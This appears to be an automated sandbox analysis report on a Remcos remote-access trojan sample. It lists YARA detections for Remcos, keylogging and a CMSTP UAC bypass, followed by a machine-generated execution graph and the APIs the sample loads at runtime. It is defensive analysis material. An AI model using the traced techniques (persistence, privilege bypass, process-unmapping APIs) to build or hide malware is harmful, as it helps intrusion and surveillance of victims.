                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2278167412.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:30.6%
                                                  Total number of Nodes:722
                                                  Total number of Limit Nodes:17
                                                  execution_graph 47047 434918 47048 434924 ___DestructExceptionObject 47047->47048 47074 434627 47048->47074 47050 43492b 47052 434954 47050->47052 47362 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47050->47362 47061 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47052->47061 47363 4442d2 5 API calls ___crtLCMapStringA 47052->47363 47054 43496d 47056 434973 ___DestructExceptionObject 47054->47056 47364 444276 5 API calls ___crtLCMapStringA 47054->47364 47057 4349f3 47085 434ba5 47057->47085 47061->47057 47365 443487 35 API calls 5 library calls 47061->47365 47067 434a15 47068 434a1f 47067->47068 47367 4434bf 28 API calls _abort 47067->47367 47070 434a28 47068->47070 47368 443462 28 API calls _abort 47068->47368 47369 43479e 13 API calls 2 library calls 47070->47369 47073 434a30 47073->47056 47075 434630 47074->47075 47370 434cb6 IsProcessorFeaturePresent 47075->47370 47077 43463c 47371 438fb1 10 API calls 4 library calls 47077->47371 47079 434641 47080 434645 47079->47080 47372 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47079->47372 47080->47050 47082 43464e 47083 43465c 47082->47083 47373 438fda 8 API calls 3 library calls 47082->47373 47083->47050 47374 436f10 47085->47374 47088 4349f9 47089 444223 47088->47089 47376 44f0d9 47089->47376 47091 44422c 47092 434a02 47091->47092 47380 446895 35 API calls 47091->47380 47094 40ea00 47092->47094 47382 41cbe1 LoadLibraryA GetProcAddress 47094->47382 47096 40ea1c GetModuleFileNameW 47387 40f3fe 47096->47387 47098 40ea38 47402 4020f6 47098->47402 47101 4020f6 28 API calls 47102 40ea56 47101->47102 47408 41beac 47102->47408 47106 40ea68 47434 401e8d 47106->47434 47108 40ea71 47109 40ea84 47108->47109 47110 40eace 47108->47110 47646 40fbee 116 API calls 47109->47646 47440 401e65 47110->47440 47113 40eade 47117 401e65 22 API calls 47113->47117 47114 40ea96 47115 401e65 22 API calls 47114->47115 47116 40eaa2 47115->47116 47647 410f72 36 API calls __EH_prolog 47116->47647 47118 40eafd 47117->47118 47445 40531e 47118->47445 47121 40eab4 47648 40fb9f 77 API calls 47121->47648 47122 40eb0c 47450 406383 47122->47450 47125 40eabd 47649 40f3eb 70 API calls 47125->47649 47132 401fd8 11 API calls 47134 40ef36 47132->47134 47133 401fd8 11 API calls 47135 40eb36 47133->47135 47366 443396 GetModuleHandleW 47134->47366 47136 401e65 22 API calls 47135->47136 47137 40eb3f 47136->47137 47467 401fc0 47137->47467 47139 40eb4a 47140 401e65 22 API calls 47139->47140 47141 40eb63 47140->47141 47142 401e65 22 API calls 47141->47142 47143 40eb7e 47142->47143 47144 40ebe9 47143->47144 47471 406c59 47143->47471 47145 401e65 22 API calls 47144->47145 47150 40ebf6 47145->47150 47147 40ebab 47148 401fe2 28 API calls 47147->47148 47149 40ebb7 47148->47149 47152 401fd8 11 API calls 47149->47152 47151 40ec3d 47150->47151 47157 413584 3 API calls 47150->47157 47479 40d0a4 47151->47479 47153 40ebc0 47152->47153 47476 413584 RegOpenKeyExA 47153->47476 47155 40ec43 47156 40eac6 47155->47156 47482 41b354 47155->47482 47156->47132 47163 40ec21 47157->47163 47161 40ec5e 47164 40ecb1 47161->47164 47499 407751 47161->47499 47162 40f38a 47679 4139e4 30 API calls 47162->47679 47163->47151 47650 4139e4 30 API calls 47163->47650 47167 401e65 22 API calls 47164->47167 47170 40ecba 47167->47170 47169 40f3a0 47680 4124b0 65 API calls ___scrt_get_show_window_mode 47169->47680 47178 40ecc6 47170->47178 47179 40eccb 47170->47179 47173 40ec87 47176 401e65 22 API calls 47173->47176 47174 40ec7d 47651 407773 30 API calls 47174->47651 47188 40ec90 47176->47188 47177 40f388 47181 41bcef 28 API calls 47177->47181 47654 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47178->47654 47184 401e65 22 API calls 47179->47184 47180 40ec82 47652 40729b 97 API calls 47180->47652 47185 40f3ba 47181->47185 47186 40ecd4 47184->47186 47681 413a5e RegOpenKeyExW RegDeleteValueW 47185->47681 47503 41bcef 47186->47503 47188->47164 47192 40ecac 47188->47192 47189 40ecdf 47507 401f13 47189->47507 47653 40729b 97 API calls 47192->47653 47193 40f3cd 47196 401f09 11 API calls 47193->47196 47198 40f3d7 47196->47198 47200 401f09 11 API calls 47198->47200 47201 40f3e0 47200->47201 47682 40dd7d 27 API calls 47201->47682 47202 401e65 22 API calls 47204 40ecfc 47202->47204 47207 401e65 22 API calls 47204->47207 47205 40f3e5 47683 414f65 169 API calls _strftime 47205->47683 47209 40ed16 47207->47209 47210 401e65 22 API calls 47209->47210 47211 40ed30 47210->47211 47212 401e65 22 API calls 47211->47212 47213 40ed49 47212->47213 47214 40edb6 47213->47214 47216 401e65 22 API calls 47213->47216 47215 40edc5 47214->47215 47221 40ef41 ___scrt_get_show_window_mode 47214->47221 47217 401e65 22 API calls 47215->47217 47222 40ee4a 47215->47222 47219 40ed5e _wcslen 47216->47219 47218 40edd7 47217->47218 47220 401e65 22 API calls 47218->47220 47219->47214 47223 401e65 22 API calls 47219->47223 47224 40ede9 47220->47224 47657 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47221->47657 47245 40ee45 ___scrt_get_show_window_mode 47222->47245 47225 40ed79 47223->47225 47227 401e65 22 API calls 47224->47227 47228 401e65 22 API calls 47225->47228 47229 40edfb 47227->47229 47230 40ed8e 47228->47230 47232 401e65 22 API calls 47229->47232 47519 40da6f 47230->47519 47231 40ef8c 47233 401e65 22 API calls 47231->47233 47234 40ee24 47232->47234 47235 40efb1 47233->47235 47239 401e65 22 API calls 47234->47239 47658 402093 47235->47658 47238 401f13 28 API calls 47241 40edad 47238->47241 47243 40ee35 47239->47243 47242 401f09 11 API calls 47241->47242 47242->47214 47577 40ce34 47243->47577 47244 40efc3 47664 4137aa 14 API calls 47244->47664 47245->47222 47655 413982 31 API calls 47245->47655 47249 40eede ctype 47253 401e65 22 API calls 47249->47253 47250 40efd9 47251 401e65 22 API calls 47250->47251 47252 40efe5 47251->47252 47665 43bb2c 39 API calls _strftime 47252->47665 47256 40eef5 47253->47256 47255 40eff2 47257 40f01f 47255->47257 47666 41ce2c 87 API calls ___scrt_get_show_window_mode 47255->47666 47256->47231 47258 401e65 22 API calls 47256->47258 47262 402093 28 API calls 47257->47262 47260 40ef12 47258->47260 47263 41bcef 28 API calls 47260->47263 47261 40f003 CreateThread 47261->47257 47946 41d4ee 10 API calls 47261->47946 47264 40f034 47262->47264 47265 40ef1e 47263->47265 47267 402093 28 API calls 47264->47267 47656 40f4af 106 API calls 47265->47656 47268 40f043 47267->47268 47667 41b580 79 API calls 47268->47667 47269 40ef23 47269->47231 47271 40ef2a 47269->47271 47271->47156 47272 40f048 47273 401e65 22 API calls 47272->47273 47274 40f054 47273->47274 47275 401e65 22 API calls 47274->47275 47276 40f066 47275->47276 47277 401e65 22 API calls 47276->47277 47278 40f086 47277->47278 47668 43bb2c 39 API calls _strftime 47278->47668 47280 40f093 47281 401e65 22 API calls 47280->47281 47282 40f09e 47281->47282 47283 401e65 22 API calls 47282->47283 47284 40f0af 47283->47284 47285 401e65 22 API calls 47284->47285 47286 40f0c4 47285->47286 47287 401e65 22 API calls 47286->47287 47288 40f0d5 47287->47288 47289 40f0dc StrToIntA 47288->47289 47669 409e1f 171 API calls _wcslen 47289->47669 47291 40f0ee 47292 401e65 22 API calls 47291->47292 47293 40f0f7 47292->47293 47294 40f13c 47293->47294 47670 43455e 22 API calls 3 library calls 47293->47670 47296 401e65 22 API calls 47294->47296 47301 40f14c 47296->47301 47297 40f10c 47298 401e65 22 API calls 47297->47298 47299 40f11f 47298->47299 47302 40f126 CreateThread 47299->47302 47300 40f194 47304 401e65 22 API calls 47300->47304 47301->47300 47671 43455e 22 API calls 3 library calls 47301->47671 47302->47294 47943 41a045 109 API calls 2 library calls 47302->47943 47309 40f19d 47304->47309 47305 40f161 47306 401e65 22 API calls 47305->47306 47307 40f173 47306->47307 47312 40f17a CreateThread 47307->47312 47308 40f207 47310 401e65 22 API calls 47308->47310 47309->47308 47311 401e65 22 API calls 47309->47311 47315 40f210 47310->47315 47313 40f1b9 47311->47313 47312->47300 47940 41a045 109 API calls 2 library calls 47312->47940 47316 401e65 22 API calls 47313->47316 47314 40f255 47675 41b69e 80 API calls 47314->47675 47315->47314 47318 401e65 22 API calls 47315->47318 47319 40f1ce 47316->47319 47321 40f225 47318->47321 47672 40da23 32 API calls 47319->47672 47320 40f25e 47322 401f13 28 API calls 47320->47322 47326 401e65 22 API calls 47321->47326 47323 40f269 47322->47323 47325 401f09 11 API calls 47323->47325 47328 40f272 CreateThread 47325->47328 47329 40f23a 47326->47329 47327 40f1e1 47330 401f13 28 API calls 47327->47330 47333 40f293 CreateThread 47328->47333 47334 40f29f 47328->47334 47941 40f7e2 120 API calls 47328->47941 47673 43bb2c 39 API calls _strftime 47329->47673 47332 40f1ed 47330->47332 47335 401f09 11 API calls 47332->47335 47333->47334 47942 412132 138 API calls 47333->47942 47336 40f2b4 47334->47336 47337 40f2a8 CreateThread 47334->47337 47339 40f1f6 CreateThread 47335->47339 47341 40f307 47336->47341 47343 402093 28 API calls 47336->47343 47337->47336 47944 412716 38 API calls ___scrt_get_show_window_mode 47337->47944 47339->47308 47945 401a6d 49 API calls _strftime 47339->47945 47340 40f247 47674 40c19d 7 API calls 47340->47674 47677 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 47341->47677 47344 40f2d7 47343->47344 47676 4052fd 28 API calls 47344->47676 47348 40f31f 47348->47201 47350 41bcef 28 API calls 47348->47350 47352 40f338 47350->47352 47678 413656 31 API calls 47352->47678 47357 40f34e 47358 401f09 11 API calls 47357->47358 47360 40f359 47358->47360 47359 40f381 DeleteFileW 47359->47177 47359->47360 47360->47177 47360->47359 47361 40f36f Sleep 47360->47361 47361->47360 47362->47050 47363->47054 47364->47061 47365->47057 47366->47067 47367->47068 47368->47070 47369->47073 47370->47077 47371->47079 47372->47082 47373->47080 47375 434bb8 GetStartupInfoW 47374->47375 47375->47088 47377 44f0eb 47376->47377 47378 44f0e2 47376->47378 47377->47091 47381 44efd8 48 API calls 5 library calls 47378->47381 47380->47091 47381->47377 47383 41cc20 LoadLibraryA GetProcAddress 47382->47383 47384 41cc10 GetModuleHandleA GetProcAddress 47382->47384 47385 41cc49 44 API calls 47383->47385 47386 41cc39 LoadLibraryA GetProcAddress 47383->47386 47384->47383 47385->47096 47386->47385 47684 41b539 FindResourceA 47387->47684 47391 40f428 _Yarn 47696 4020b7 47391->47696 47394 401fe2 28 API calls 47395 40f44e 47394->47395 47396 401fd8 11 API calls 47395->47396 47397 40f457 47396->47397 47398 43bda0 _Yarn 21 API calls 47397->47398 47399 40f468 _Yarn 47398->47399 47702 406e13 47399->47702 47401 40f49b 47401->47098 47403 40210c 47402->47403 47404 4023ce 11 API calls 47403->47404 47405 402126 47404->47405 47406 402569 28 API calls 47405->47406 47407 402134 47406->47407 47407->47101 47739 4020df 47408->47739 47410 401fd8 11 API calls 47412 41bf61 47410->47412 47411 41bebf 47414 41bf31 47411->47414 47420 401fe2 28 API calls 47411->47420 47425 401fd8 11 API calls 47411->47425 47429 41bf2f 47411->47429 47743 4041a2 28 API calls 47411->47743 47744 41cec5 28 API calls 47411->47744 47413 401fd8 11 API calls 47412->47413 47415 41bf69 47413->47415 47745 4041a2 28 API calls 47414->47745 47418 401fd8 11 API calls 47415->47418 47421 40ea5f 47418->47421 47419 41bf3d 47422 401fe2 28 API calls 47419->47422 47420->47411 47430 40fb52 47421->47430 47423 41bf46 47422->47423 47424 401fd8 11 API calls 47423->47424 47426 41bf4e 47424->47426 47425->47411 47746 41cec5 28 API calls 47426->47746 47429->47410 47431 40fb5e 47430->47431 47433 40fb65 47430->47433 47747 402163 11 API calls 47431->47747 47433->47106 47435 402163 47434->47435 47436 40219f 47435->47436 47748 402730 11 API calls 47435->47748 47436->47108 47438 402184 47749 402712 11 API calls std::_Deallocate 47438->47749 47441 401e6d 47440->47441 47442 401e75 47441->47442 47750 402158 22 API calls 47441->47750 47442->47113 47446 4020df 11 API calls 47445->47446 47447 40532a 47446->47447 47751 4032a0 47447->47751 47449 405346 47449->47122 47756 4051ef 47450->47756 47452 406391 47760 402055 47452->47760 47455 401fe2 47456 401ff1 47455->47456 47457 402039 47455->47457 47458 4023ce 11 API calls 47456->47458 47464 401fd8 47457->47464 47459 401ffa 47458->47459 47460 40203c 47459->47460 47461 402015 47459->47461 47462 40267a 11 API calls 47460->47462 47775 403098 28 API calls 47461->47775 47462->47457 47465 4023ce 11 API calls 47464->47465 47466 401fe1 47465->47466 47466->47133 47468 401fd2 47467->47468 47469 401fc9 47467->47469 47468->47139 47776 4025e0 28 API calls 47469->47776 47472 4020df 11 API calls 47471->47472 47473 406c65 47472->47473 47474 4032a0 28 API calls 47473->47474 47475 406c82 47474->47475 47475->47147 47477 40ebdf 47476->47477 47478 4135ae RegQueryValueExA RegCloseKey 47476->47478 47477->47144 47477->47162 47478->47477 47777 401fab 47479->47777 47481 40d0ae CreateMutexA GetLastError 47481->47155 47778 41c048 47482->47778 47487 401fe2 28 API calls 47488 41b390 47487->47488 47489 401fd8 11 API calls 47488->47489 47490 41b398 47489->47490 47491 4135e1 31 API calls 47490->47491 47493 41b3ee 47490->47493 47492 41b3c1 47491->47492 47494 41b3cc StrToIntA 47492->47494 47493->47161 47495 41b3da 47494->47495 47498 41b3e3 47494->47498 47787 41cffa 22 API calls 47495->47787 47497 401fd8 11 API calls 47497->47493 47498->47497 47500 407765 47499->47500 47501 413584 3 API calls 47500->47501 47502 40776c 47501->47502 47502->47173 47502->47174 47504 41bd03 47503->47504 47788 40b93f 47504->47788 47506 41bd0b 47506->47189 47508 401f22 47507->47508 47509 401f6a 47507->47509 47510 402252 11 API calls 47508->47510 47516 401f09 47509->47516 47511 401f2b 47510->47511 47512 401f6d 47511->47512 47513 401f46 47511->47513 47821 402336 47512->47821 47820 40305c 28 API calls 47513->47820 47517 402252 11 API calls 47516->47517 47518 401f12 47517->47518 47518->47202 47825 401f86 47519->47825 47522 40dae0 47526 41c048 2 API calls 47522->47526 47523 40daab 47835 41b645 29 API calls 47523->47835 47524 40dbd4 GetLongPathNameW 47829 40417e 47524->47829 47525 40daa1 47525->47524 47529 40dae5 47526->47529 47532 40dae9 47529->47532 47533 40db3b 47529->47533 47530 40dab4 47534 401f13 28 API calls 47530->47534 47537 40417e 28 API calls 47532->47537 47536 40417e 28 API calls 47533->47536 47538 40dabe 47534->47538 47535 40417e 28 API calls 47539 40dbf8 47535->47539 47540 40db49 47536->47540 47541 40daf7 47537->47541 47542 401f09 11 API calls 47538->47542 47838 40de0c 28 API calls 47539->47838 47546 40417e 28 API calls 47540->47546 47547 40417e 28 API calls 47541->47547 47542->47525 47544 40dc0b 47839 402fa5 28 API calls 47544->47839 47549 40db5f 47546->47549 47550 40db0d 47547->47550 47548 40dc16 47840 402fa5 28 API calls 47548->47840 47837 402fa5 28 API calls 47549->47837 47836 402fa5 28 API calls 47550->47836 47554 40dc20 47558 401f09 11 API calls 47554->47558 47555 40db6a 47559 401f13 28 API calls 47555->47559 47556 40db18 47557 401f13 28 API calls 47556->47557 47561 40db23 47557->47561 47562 40dc2a 47558->47562 47560 40db75 47559->47560 47563 401f09 11 API calls 47560->47563 47564 401f09 11 API calls 47561->47564 47565 401f09 11 API calls 47562->47565 47567 40db7e 47563->47567 47568 40db2c 47564->47568 47566 40dc33 47565->47566 47569 401f09 11 API calls 47566->47569 47570 401f09 11 API calls 47567->47570 47571 401f09 11 API calls 47568->47571 47572 40dc3c 47569->47572 47570->47538 47571->47538 47573 401f09 11 API calls 47572->47573 47574 40dc45 47573->47574 47575 401f09 11 API calls 47574->47575 47576 40dc4e 47575->47576 47576->47238 47578 40ce47 _wcslen 47577->47578 47579 40ce51 47578->47579 47580 40ce9b 47578->47580 47583 40ce5a CreateDirectoryW 47579->47583 47581 40da6f 32 API calls 47580->47581 47582 40cead 47581->47582 47584 401f13 28 API calls 47582->47584 47842 409196 47583->47842 47586 40ce99 47584->47586 47588 401f09 11 API calls 47586->47588 47587 40ce76 47876 403014 47587->47876 47593 40cec4 47588->47593 47591 401f13 28 API calls 47592 40ce90 47591->47592 47594 401f09 11 API calls 47592->47594 47595 40cefa 47593->47595 47596 40cedd 47593->47596 47594->47586 47597 40cf03 CopyFileW 47595->47597 47599 40cd48 31 API calls 47596->47599 47598 40cf15 _wcslen 47597->47598 47601 40cfd4 47597->47601 47598->47601 47603 40cf31 47598->47603 47604 40cf84 47598->47604 47600 40ceee 47599->47600 47600->47245 47849 40cd48 47601->47849 47607 40da6f 32 API calls 47603->47607 47606 40da6f 32 API calls 47604->47606 47605 40cfe5 47608 40d01a 47605->47608 47616 40cff7 SetFileAttributesW 47605->47616 47610 40cf8a 47606->47610 47611 40cf37 47607->47611 47609 40d062 CloseHandle 47608->47609 47613 40417e 28 API calls 47608->47613 47875 401f04 47609->47875 47614 401f13 28 API calls 47610->47614 47615 401f13 28 API calls 47611->47615 47618 40d030 47613->47618 47619 40cf7e 47614->47619 47620 40cf43 47615->47620 47630 40d006 _wcslen 47616->47630 47617 40d07e ShellExecuteW 47621 40d091 47617->47621 47622 40d09b ExitProcess 47617->47622 47623 41bcef 28 API calls 47618->47623 47627 401f09 11 API calls 47619->47627 47624 401f09 11 API calls 47620->47624 47625 40d0a4 CreateMutexA GetLastError 47621->47625 47626 40d043 47623->47626 47628 40cf4c 47624->47628 47625->47600 47882 41384f RegCreateKeyW 47626->47882 47631 40cf9c 47627->47631 47629 409196 28 API calls 47628->47629 47632 40cf60 47629->47632 47630->47608 47633 40d017 SetFileAttributesW 47630->47633 47634 40cfa8 CreateDirectoryW 47631->47634 47635 403014 28 API calls 47632->47635 47633->47608 47881 401f04 47634->47881 47638 40cf6c 47635->47638 47641 401f13 28 API calls 47638->47641 47644 40cf75 47641->47644 47642 401f09 11 API calls 47642->47609 47645 401f09 11 API calls 47644->47645 47645->47619 47646->47114 47647->47121 47648->47125 47650->47151 47651->47180 47652->47173 47653->47164 47654->47179 47655->47249 47656->47269 47657->47231 47659 40209b 47658->47659 47660 4023ce 11 API calls 47659->47660 47661 4020a6 47660->47661 47935 4024ed 47661->47935 47664->47250 47665->47255 47666->47261 47667->47272 47668->47280 47669->47291 47670->47297 47671->47305 47672->47327 47673->47340 47674->47314 47675->47320 47677->47348 47678->47357 47679->47169 47681->47193 47682->47205 47939 41ada8 105 API calls 47683->47939 47685 41b556 LoadResource LockResource SizeofResource 47684->47685 47686 40f419 47684->47686 47685->47686 47687 43bda0 47686->47687 47688 4461b8 47687->47688 47689 4461f6 47688->47689 47690 4461e1 HeapAlloc 47688->47690 47691 4461ca ___crtLCMapStringA 47688->47691 47706 44062d 20 API calls _abort 47689->47706 47690->47691 47693 4461f4 47690->47693 47691->47689 47691->47690 47705 443001 7 API calls 2 library calls 47691->47705 47694 4461fb 47693->47694 47694->47391 47697 4020bf 47696->47697 47707 4023ce 47697->47707 47699 4020ca 47711 40250a 47699->47711 47701 4020d9 47701->47394 47703 4020b7 28 API calls 47702->47703 47704 406e27 47703->47704 47704->47401 47705->47691 47706->47694 47708 402428 47707->47708 47709 4023d8 47707->47709 47708->47699 47709->47708 47718 4027a7 11 API calls std::_Deallocate 47709->47718 47712 40251a 47711->47712 47713 402520 47712->47713 47714 402535 47712->47714 47719 402569 47713->47719 47729 4028e8 28 API calls 47714->47729 47717 402533 47717->47701 47718->47708 47730 402888 47719->47730 47721 40257d 47722 402592 47721->47722 47723 4025a7 47721->47723 47735 402a34 22 API calls 47722->47735 47737 4028e8 28 API calls 47723->47737 47726 40259b 47736 4029da 22 API calls 47726->47736 47728 4025a5 47728->47717 47729->47717 47731 402890 47730->47731 47732 402898 47731->47732 47738 402ca3 22 API calls 47731->47738 47732->47721 47735->47726 47736->47728 47737->47728 47740 4020e7 47739->47740 47741 4023ce 11 API calls 47740->47741 47742 4020f2 47741->47742 47742->47411 47743->47411 47744->47411 47745->47419 47746->47429 47747->47433 47748->47438 47749->47436 47753 4032aa 47751->47753 47752 4032c9 47752->47449 47753->47752 47755 4028e8 28 API calls 47753->47755 47755->47752 47757 4051fb 47756->47757 47766 405274 47757->47766 47759 405208 47759->47452 47761 402061 47760->47761 47762 4023ce 11 API calls 47761->47762 47763 40207b 47762->47763 47771 40267a 47763->47771 47767 405282 47766->47767 47770 4028a4 22 API calls 47767->47770 47772 40268b 47771->47772 47773 4023ce 11 API calls 47772->47773 47774 40208d 47773->47774 47774->47455 47775->47457 47776->47468 47779 41b362 47778->47779 47780 41c055 GetCurrentProcess IsWow64Process 47778->47780 47782 4135e1 RegOpenKeyExA 47779->47782 47780->47779 47781 41c06c 47780->47781 47781->47779 47783 413639 47782->47783 47784 41360f RegQueryValueExA RegCloseKey 47782->47784 47785 402093 28 API calls 47783->47785 47784->47783 47786 41364e 47785->47786 47786->47487 47787->47498 47789 40b947 47788->47789 47794 402252 47789->47794 47791 40b952 47798 40b967 47791->47798 47793 40b961 47793->47506 47795 4022ac 47794->47795 47796 40225c 47794->47796 47795->47791 47796->47795 47805 402779 11 API calls std::_Deallocate 47796->47805 47799 40b9a1 47798->47799 47800 40b973 47798->47800 47817 4028a4 22 API calls 47799->47817 47806 4027e6 47800->47806 47804 40b97d 47804->47793 47805->47795 47807 4027ef 47806->47807 47808 402851 47807->47808 47809 4027f9 47807->47809 47819 4028a4 22 API calls 47808->47819 47812 402802 47809->47812 47813 402815 47809->47813 47818 402aea 28 API calls __EH_prolog 47812->47818 47815 402813 47813->47815 47816 402252 11 API calls 47813->47816 47815->47804 47816->47815 47818->47815 47820->47509 47822 402347 47821->47822 47823 402252 11 API calls 47822->47823 47824 4023c7 47823->47824 47824->47509 47826 401f8e 47825->47826 47827 402252 11 API calls 47826->47827 47828 401f99 47827->47828 47828->47522 47828->47523 47828->47525 47830 404186 47829->47830 47831 402252 11 API calls 47830->47831 47832 404191 47831->47832 47841 4041bc 28 API calls 47832->47841 47834 40419c 47834->47535 47835->47530 47836->47556 47837->47555 47838->47544 47839->47548 47840->47554 47841->47834 47843 401f86 11 API calls 47842->47843 47844 4091a2 47843->47844 47888 40314c 47844->47888 47846 4091bf 47892 40325d 47846->47892 47848 4091c7 47848->47587 47850 40cdaa 47849->47850 47851 40cd6e 47849->47851 47852 40cdeb 47850->47852 47854 40b9b7 28 API calls 47850->47854 47906 40b9b7 47851->47906 47855 40ce2c 47852->47855 47858 40b9b7 28 API calls 47852->47858 47857 40cdc1 47854->47857 47855->47605 47860 403014 28 API calls 47857->47860 47861 40ce02 47858->47861 47859 403014 28 API calls 47862 40cd8a 47859->47862 47865 40cdcb 47860->47865 47863 403014 28 API calls 47861->47863 47864 41384f 14 API calls 47862->47864 47866 40ce0c 47863->47866 47867 40cd9e 47864->47867 47868 41384f 14 API calls 47865->47868 47869 41384f 14 API calls 47866->47869 47870 401f09 11 API calls 47867->47870 47871 40cddf 47868->47871 47872 40ce20 47869->47872 47870->47850 47873 401f09 11 API calls 47871->47873 47874 401f09 11 API calls 47872->47874 47873->47852 47874->47855 47913 403222 47876->47913 47878 403022 47917 403262 47878->47917 47883 4138a1 47882->47883 47885 413864 47882->47885 47884 401f09 11 API calls 47883->47884 47886 40d056 47884->47886 47887 41387d RegSetValueExW RegCloseKey 47885->47887 47886->47642 47887->47883 47889 403156 47888->47889 47890 4027e6 28 API calls 47889->47890 47891 403175 47889->47891 47890->47891 47891->47846 47893 40323f 47892->47893 47896 4036a6 47893->47896 47895 40324c 47895->47848 47897 402888 22 API calls 47896->47897 47898 4036b9 47897->47898 47899 40372c 47898->47899 47900 4036de 47898->47900 47905 4028a4 22 API calls 47899->47905 47903 4027e6 28 API calls 47900->47903 47904 4036f0 47900->47904 47903->47904 47904->47895 47907 401f86 11 API calls 47906->47907 47908 40b9c3 47907->47908 47909 40314c 28 API calls 47908->47909 47910 40b9df 47909->47910 47911 40325d 28 API calls 47910->47911 47912 40b9f2 47911->47912 47912->47859 47914 40322e 47913->47914 47923 403618 47914->47923 47916 40323b 47916->47878 47918 40326e 47917->47918 47919 402252 11 API calls 47918->47919 47920 403288 47919->47920 47921 402336 11 API calls 47920->47921 47922 403031 47921->47922 47922->47591 47924 403626 47923->47924 47925 403644 47924->47925 47926 40362c 47924->47926 47927 40365c 47925->47927 47928 40369e 47925->47928 47929 4036a6 28 API calls 47926->47929 47931 4027e6 28 API calls 47927->47931 47933 403642 47927->47933 47934 4028a4 22 API calls 47928->47934 47929->47933 47931->47933 47933->47916 47936 4024f9 47935->47936 47937 40250a 28 API calls 47936->47937 47938 4020b1 47937->47938 47938->47244 47947 412829 61 API calls 47942->47947 47948 43bea8 47951 43beb4 _swprintf ___DestructExceptionObject 47948->47951 47949 43bec2 47964 44062d 20 API calls _abort 47949->47964 47951->47949 47953 43beec 47951->47953 47952 43bec7 ___DestructExceptionObject ___std_exception_copy 47959 445909 EnterCriticalSection 47953->47959 47955 43bef7 47960 43bf98 47955->47960 47959->47955 47962 43bfa6 47960->47962 47961 43bf02 47965 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47961->47965 47962->47961 47966 4497ec 36 API calls 2 library calls 47962->47966 47964->47952 47965->47952 47966->47962

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
